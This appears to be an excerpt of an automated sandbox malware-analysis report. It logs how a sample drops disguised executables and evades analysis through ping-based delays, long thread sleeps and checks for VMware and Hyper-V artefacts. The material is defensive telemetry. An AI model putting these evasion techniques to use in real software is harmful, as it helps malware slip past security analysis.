                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeMemory allocated: 1AB0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeMemory allocated: 1B4A0000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: D70000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1A740000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 2AA0000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1AC80000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1040000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1AD30000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 2C70000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1AED0000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1740000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1B330000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: BD0000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1A910000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1000000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1AE00000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 15B0000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1AE50000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1260000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1AE20000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: F80000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1AB90000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: E20000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1A9E0000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB1A49D sldt word ptr [eax]15_2_00007FFD9BB1A49D
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23434
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe TID: 7484Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7672Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7996Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7968Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 5348Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 6092Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 2004Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7108Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7488Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7328Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7516Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7520Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 3052Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 2196Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7752Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7740Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 708Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7960Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 8164Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 1076Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 2792Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 1712Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_002DA69B
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_002EC220
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EE6A3 VirtualQuery,GetSystemInfo,0_2_002EE6A3
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user\AppData
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user\AppData\Local
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000003F.00000002.2551375996.000000001B353000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000020.00000002.2088916085.000000001BCB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                                    Source: w32tm.exe, 00000008.00000002.1744031152.000001501C579000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWnI
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002A.00000002.2278947690.000000001B782000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2202365450.000000001B237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\9
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002F.00000002.2343920548.000000001B889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002F.00000002.2343920548.000000001B889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oL
